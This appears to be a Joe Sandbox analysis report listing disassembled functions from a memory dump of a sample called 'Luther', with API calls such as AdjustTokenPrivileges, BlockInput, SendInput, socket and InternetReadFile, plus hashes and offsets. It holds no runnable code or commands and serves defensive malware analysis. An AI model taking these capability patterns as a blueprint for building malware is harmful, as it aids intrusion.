Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 2be76e7c337d2fa60e60d4fd73506c135fb04ade711ff1383acb1e5d00931500
Instruction ID: 9923b3cea0c0c998aa5eaaa4454861dbd94049e73a572cd8ec80f6e1e99d1644
Opcode Fuzzy Hash: 2be76e7c337d2fa60e60d4fd73506c135fb04ade711ff1383acb1e5d00931500
Instruction Fuzzy Hash: 6E117C71200701BFD7258B26DC48F277BBDEBC9B54F14427CB452EA660DB72ED058620

Function 00E920AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E91900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E91916
Part of subcall function 00E91900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E91922
Part of subcall function 00E91900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E91931
Part of subcall function 00E91900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E91938
Part of subcall function 00E91900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E9194E

GetLengthSid.ADVAPI32(?,00000000,00E91C81), ref: 00E920FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E92107
HeapAlloc.KERNEL32(00000000), ref: 00E9210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00E92127
GetProcessHeap.KERNEL32(00000000,00000000,00E91C81), ref: 00E9213B
HeapFree.KERNEL32(00000000), ref: 00E92142

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 90ea3337b0cdbf4c2df9ea805647825fe3c0b394bbe6c745c15003ac4f54aabf
Instruction ID: f7b69026edb8d9e17943cb94679605a2423c940662168bf012e2b8f14d4ff9ff
Opcode Fuzzy Hash: 90ea3337b0cdbf4c2df9ea805647825fe3c0b394bbe6c745c15003ac4f54aabf
Instruction Fuzzy Hash: 8A11AC72502205FFDF109B66CC09FAE7BA9EF44359F14802CEA41B7220C7369945CB64

Function 00EAA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EAA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EAA6D0

Part of subcall function 00EA42B9: GetInputState.USER32 ref: 00EA4310
Part of subcall function 00EA42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EAA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EAA6BA

Strings

*.*, xrefs: 00EAA5A2

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: c5f468e2c47894c75521b86b1378edc108176742da7b96589352f665ab361ea5
Instruction ID: 7d901cfc3a1c663cdedfbdbab2ab73b776f158cf6ae7ba746a5d84a6a10ffd8b
Opcode Fuzzy Hash: c5f468e2c47894c75521b86b1378edc108176742da7b96589352f665ab361ea5
Instruction Fuzzy Hash: 4541627190030AAFCF14DF64CD49AEEBBB4EF4A314F185069E805B61A1EB31AE45CF61

Function 00E322AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00E3233E
GetSysColor.USER32(0000000F), ref: 00E32421
SetBkColor.GDI32(?,00000000), ref: 00E32434

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 6357c53bcf466881b80ff78e0cb8f6c3c34ccd2e6a379886ac6d270327c3af52
Instruction ID: 0b8ae7f69acc33a9b30d2adcb83d5f8d6bf4fad0175d50f1ca00eb2e36c129ad
Opcode Fuzzy Hash: 6357c53bcf466881b80ff78e0cb8f6c3c34ccd2e6a379886ac6d270327c3af52
Instruction Fuzzy Hash: DC811BB0104405BEE22D653D4D9CEBF2DDEDB42308F15A11EF382F6596C96A8F42E276

Function 00EB2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EB3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB3AD7
Part of subcall function 00EB3AAB: _wcslen.LIBCMT ref: 00EB3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EB22BA
WSAGetLastError.WSOCK32 ref: 00EB22E1
bind.WSOCK32(00000000,?,00000010), ref: 00EB2338
WSAGetLastError.WSOCK32 ref: 00EB2343
closesocket.WSOCK32(00000000), ref: 00EB2372

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 572d9c3e13ba3663fccc5ba20f116e7d018a7d762f5e12f60f89e93d94274e0c
Instruction ID: 43493107ab3a8f5e746e6cbf5915e88b7018ec4db92c91ac7dbfa8f7157a5505
Opcode Fuzzy Hash: 572d9c3e13ba3663fccc5ba20f116e7d018a7d762f5e12f60f89e93d94274e0c
Instruction Fuzzy Hash: 5951A471A00200AFD714AF24C88AF6A7BE59F44758F54909CF945BF3D3C675AD42CBA1

Function 00EC26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00EC275C
IsWindowEnabled.USER32 ref: 00EC276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00EC2777
IsIconic.USER32 ref: 00EC2785
IsZoomed.USER32 ref: 00EC2793

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: da90c4caf7e4f92a7177b0d98c7f9974db7c24160823f0ea9be1fe752a42ec7d
Instruction ID: d456ca59f1af27f80e0691edf35dc930f6d982072bcdc20371422cba9498a1c6
Opcode Fuzzy Hash: da90c4caf7e4f92a7177b0d98c7f9974db7c24160823f0ea9be1fe752a42ec7d
Instruction Fuzzy Hash: B621BF357042108FD7119F26C984F5A7BE5AF85328B18907EE94AAB351DB73EC43CB90

Function 00EAD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00EAD8CE
GetLastError.KERNEL32(?,00000000), ref: 00EAD92F
SetEvent.KERNEL32(?,?,00000000), ref: 00EAD943

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: baaf9649e678b4c850f7a721cfe1b79ddba94e155b8b6ba71c20b8a482df86f9
Instruction ID: 36cd74dd9ce20a64b1273b71254aa008a28bddabe2505e55b3192c680dacec33
Opcode Fuzzy Hash: baaf9649e678b4c850f7a721cfe1b79ddba94e155b8b6ba71c20b8a482df86f9
Instruction Fuzzy Hash: A221E0B1508704AFE7208F66CC48BAB77F8EB86318F10542AE646B6541D7B0FA098B50

Function 00E9E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00E746AC), ref: 00E9E482
GetFileAttributesW.KERNEL32(?), ref: 00E9E491
FindFirstFileW.KERNEL32(?,?), ref: 00E9E4A2
FindClose.KERNEL32(00000000), ref: 00E9E4AE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: c86d966c76a967073eae98fa98bafd6bc76d61f09dbd7d09a1fbff8c6796ea20
Instruction ID: 138f6a22d24cfdacc784fd7c16cdcdd6c64317771b530c138690f22edcbad426
Opcode Fuzzy Hash: c86d966c76a967073eae98fa98bafd6bc76d61f09dbd7d09a1fbff8c6796ea20
Instruction Fuzzy Hash: B1F055304089146BD214A73CAC0DCAF776DAF02339B044325F932E22F0DB7AAC8A8281

Function 00E8E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E8E5F8

Strings

X64, xrefs: 00E8E680
%.3d, xrefs: 00E8E603

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 4aace4aa95ab42e9d8d14be0877bcf7b697a4edf2fe766427012fbbb2130dcff
Instruction ID: e6cb43fad51dc0fd692114d860e8e236349564e79955a8bd3014efd46211f094
Opcode Fuzzy Hash: 4aace4aa95ab42e9d8d14be0877bcf7b697a4edf2fe766427012fbbb2130dcff
Instruction Fuzzy Hash: 36D012B1C08218DACB80A6909D48CF9737CBB18700F506462F90EB1110F620D908B721

Function 00E62992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00E62A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00E62A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00E62AA1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 826fb804a9dce934726eb40acd4271e0593ff3a4168ed1fe3abab7c532277001
Instruction ID: 028c65af6a59d493eeb552673c99eca164adfb41e992e12966d19e71b822c8fa
Opcode Fuzzy Hash: 826fb804a9dce934726eb40acd4271e0593ff3a4168ed1fe3abab7c532277001
Instruction Fuzzy Hash: 9231F57494122C9BCB21DF68DD88BDCBBB8AF08311F5055EAE80CA6260E7719F858F45

Function 00E92010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E5014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E509D8
Part of subcall function 00E5014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E509F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E92087
GetLastError.KERNEL32 ref: 00E92097

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 0bd24f52a513c7c3173db544c9e5cc2186a8793beeca4cfa959ba2625b524429
Instruction ID: a883433cfff1faca0814b0cfedcd9adf3d1bf67482784936097572504d90a17d
Opcode Fuzzy Hash: 0bd24f52a513c7c3173db544c9e5cc2186a8793beeca4cfa959ba2625b524429
Instruction Fuzzy Hash: 8711BFB1404604BFDB189F54DD86D6BB7FCEB04710B20842EF54663251EB72BC46CB20

Function 00E55058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002,00000000), ref: 00E55079
TerminateProcess.KERNEL32(00000000,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002,00000000), ref: 00E55080
ExitProcess.KERNEL32 ref: 00E55092

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8269f2aa2d6ddc5c9b7328437f540b9ecb586d18ef697081be76f0e6f22920fd
Instruction ID: fc857f7c6691965c5e6e1fc20e1bbcc02e3ba2475a36979d5533ff0360d89cf6
Opcode Fuzzy Hash: 8269f2aa2d6ddc5c9b7328437f540b9ecb586d18ef697081be76f0e6f22920fd
Instruction Fuzzy Hash: 58E04632000548AFCF216F65DD08E483BA9EB50386F004424FC09AA161DB77DD4ACBC0

Function 00E9ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E9ED04

Strings

DOWN, xrefs: 00E9ECE9

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: fa7ae6547da1af528a08bc27cdc076c3a107985120028ac06de94dba387f36ee
Instruction ID: 90d07bc792e16c17ff18827678c294a51fa5ef35c46786b00bedb22986783b85
Opcode Fuzzy Hash: fa7ae6547da1af528a08bc27cdc076c3a107985120028ac06de94dba387f36ee
Instruction Fuzzy Hash: E3E0C2A62AD7363CBD0421287C07EF7438C8F22B39B11225AFE00F41C0ED915CC651A8

Function 00E8E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00E8E664

Strings

X64, xrefs: 00E8E680

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 2e27db29b29dfef6f7f7ab8a2c88cfdccaafd803a245bb38b0a7b1d5d459eda4
Instruction ID: c79fa72926549f8cb22ee89c8c504e9af85cce3e34b455fa468e27eec412a0d2
Opcode Fuzzy Hash: 2e27db29b29dfef6f7f7ab8a2c88cfdccaafd803a245bb38b0a7b1d5d459eda4
Instruction Fuzzy Hash: 67D0C9B480512DEACB80CB50EC88DD9737CBB04304F100665F10AB2100D73095499B10

Function 00EA41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EB52EE,?,?,00000035,?), ref: 00EA4239

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6b8847515f9f18d54eb5cd235e7f7234c946ed5ed34d3b2363577fcd23f7cec4
Instruction ID: 4b57f9629778d88493571564d6939ce1147abfe2cc8327d1641ff36999f7b2da
Opcode Fuzzy Hash: 6b8847515f9f18d54eb5cd235e7f7234c946ed5ed34d3b2363577fcd23f7cec4
Instruction Fuzzy Hash: 90F0E5716043246AE72016A69C4DFEB7AADEFC9761F001175F609F22D1D9B0A905C6B0

Function 00E9BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E9BC24
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E9BC37

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 13c4b871c8d37f140bb636f95c1ba15323f4d1fd60029844622ce723aaff7152
Instruction ID: 0d2cb61d21d516bdee0e9f45ada149ffbd1b16d7949ffdb9984104dc8d23ee9c
Opcode Fuzzy Hash: 13c4b871c8d37f140bb636f95c1ba15323f4d1fd60029844622ce723aaff7152
Instruction Fuzzy Hash: 06F06D7080424DAFDF019FA1D805BFEBBB0FF04309F00901AF951A5191D37A8205DF94

Function 00E91A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E91B48), ref: 00E91A20
CloseHandle.KERNEL32(?,?,00E91B48), ref: 00E91A35

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: efa8346af30fd97ba99f3b93c81da39c5440cfd73467a6d074ec2da54b664034
Instruction ID: 40d09fdab38f1394688b746517c26539ea30ebe8cf06f6c78f004eb71ad867a7
Opcode Fuzzy Hash: efa8346af30fd97ba99f3b93c81da39c5440cfd73467a6d074ec2da54b664034
Instruction Fuzzy Hash: 27E04F72009A10AFE7252B15FC06F7677E9FF04351F14882DF89590470DBA36C96DB10

Function 00EAF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00EAF51A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ebb02fa7362aa4b3bf38bc0f1c434a388962af6fb98e94a88a3108e26108c010
Instruction ID: d79c2496ca2038f16b72139684dca377db1a5b924b3a18663dc3d149361e0915
Opcode Fuzzy Hash: ebb02fa7362aa4b3bf38bc0f1c434a388962af6fb98e94a88a3108e26108c010
Instruction Fuzzy Hash: 0FE048322002045FC710AF69D805E96FBEDAFA9761F008435F849EB351D671FD41CB94

Function 00E50D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00E5075E), ref: 00E50D4A

